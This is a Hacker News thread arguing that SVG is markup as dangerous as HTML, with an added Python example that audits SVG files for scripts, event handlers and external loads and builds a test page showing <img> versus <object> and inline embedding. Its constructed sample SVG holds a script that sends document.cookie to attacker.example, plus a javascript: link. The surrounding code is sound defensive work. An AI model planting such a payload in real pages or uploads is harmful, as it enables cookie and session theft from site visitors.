Hacker News

etchalon, yesterday at 4:41 PM

I don't understand why it wasn't immediately understood that SVG is as dangerous as HTML.

It is not, and never was, an image format. It's a markup language.


Replies

nulltrace, yesterday at 11:06 PM

Browsers already treat the same SVG differently depending on how you embed it. <img> strips scripts and external resource loads. <object> and inline don't. People test with <img> tags, it looks fine, then someone switches the embed method and everything opens up.

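One way to check for what nulltrace describes, added here as an example and not code from the thread: a Python audit that flags the active content an <img> embedding suppresses (script elements, on* event handler attributes, javascript: and external hrefs, CSS that fetches remote resources, foreignObject), plus a generated HTML page that embeds the same SVG as <img>, <object> and inline so the difference can be seen in a browser. The sample SVG, the attacker.example URLs and the function names are constructed for the example; they are not from the thread.

```python
"""Audit an SVG for content that <img> ignores but <object>, <embed>,
<iframe> and inline <svg> execute, and build a page that shows the difference.
Added example; the SVG sample and URLs below are constructed."""
import base64
import re
import xml.etree.ElementTree as ET

# Constructed sample: renders as a harmless blue box in an <img>.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="100">
  <rect width="200" height="100" fill="#9cf" onclick="alert('inline handler')"/>
  <image href="https://attacker.example/track.png" width="10" height="10"/>
  <a xlink:href="javascript:alert('link')"><text x="10" y="60">click</text></a>
  <style>@import url("https://attacker.example/x.css");</style>
  <script>fetch("https://attacker.example/?c=" + document.cookie);</script>
</svg>"""

# Absolute http(s) or protocol-relative URL: a load the <img> context blocks.
EXTERNAL = re.compile(r"^(https?:)?//", re.I)
# CSS that reaches out to another host: @import, or url(...) pointing off-site.
CSS_REMOTE = re.compile(r"@import|url\(\s*['\"]?(https?:)?//", re.I)


def local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.split("}", 1)[1] if name.startswith("{") else name


def audit_svg(svg_text):
    """Return a list of findings: each is a piece of content that only
    becomes live once the SVG is embedded as something other than <img>."""
    findings = []
    root = ET.fromstring(svg_text)
    for el in root.iter():
        tag = local(el.tag)
        if tag in ("script", "foreignObject"):
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = local(attr)
            v = value.strip().lower()
            if name.startswith("on"):
                findings.append(f"<{tag} {name}> event handler")
            elif name == "href":  # plain href and xlink:href both land here
                if v.startswith("javascript:"):
                    findings.append(f"<{tag} href> javascript: URL")
                elif EXTERNAL.match(v):
                    findings.append(f"<{tag} href> external load: {value}")
            elif name == "style" and CSS_REMOTE.search(v):
                findings.append(f"<{tag} style> CSS fetches external resource")
        if tag == "style" and el.text and CSS_REMOTE.search(el.text):
            findings.append("<style> element fetches external CSS")
    return findings


def embed_test_page(svg_text):
    """HTML that embeds one SVG three ways. Open it in a browser: the <img>
    copy is inert, the <object> and inline copies run the script. The data:
    URI gives the <object> an opaque origin; serve the same file from your
    own origin instead to watch it run with that origin's cookies."""
    data_uri = "data:image/svg+xml;base64," + base64.b64encode(
        svg_text.encode("utf-8")).decode("ascii")
    return f"""<!doctype html><meta charset="utf-8">
<h2>&lt;img&gt;: scripts and external loads suppressed</h2>
<img src="{data_uri}" alt="svg via img">
<h2>&lt;object&gt;: scripts run</h2>
<object type="image/svg+xml" data="{data_uri}"></object>
<h2>inline: scripts run as the embedding page</h2>
{svg_text}
"""


if __name__ == "__main__":
    for finding in audit_svg(SAMPLE_SVG):
        print("active content:", finding)
    with open("svg_embed_test.html", "w", encoding="utf-8") as fh:
        fh.write(embed_test_page(SAMPLE_SVG))
    print("wrote svg_embed_test.html")
```

Run it and open the generated page: the same file that was "tested with an img tag" shows a blue box in the first panel and fires the alert and the fetch in the other two. The audit is a pre-upload check, not a sanitizer; a file with any finding should be rejected or rewritten rather than trusted because the current embed method happens to neutralize it.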
recursive, yesterday at 8:29 PM

A markup language can be an image format. The "G" is for "Graphics" after all.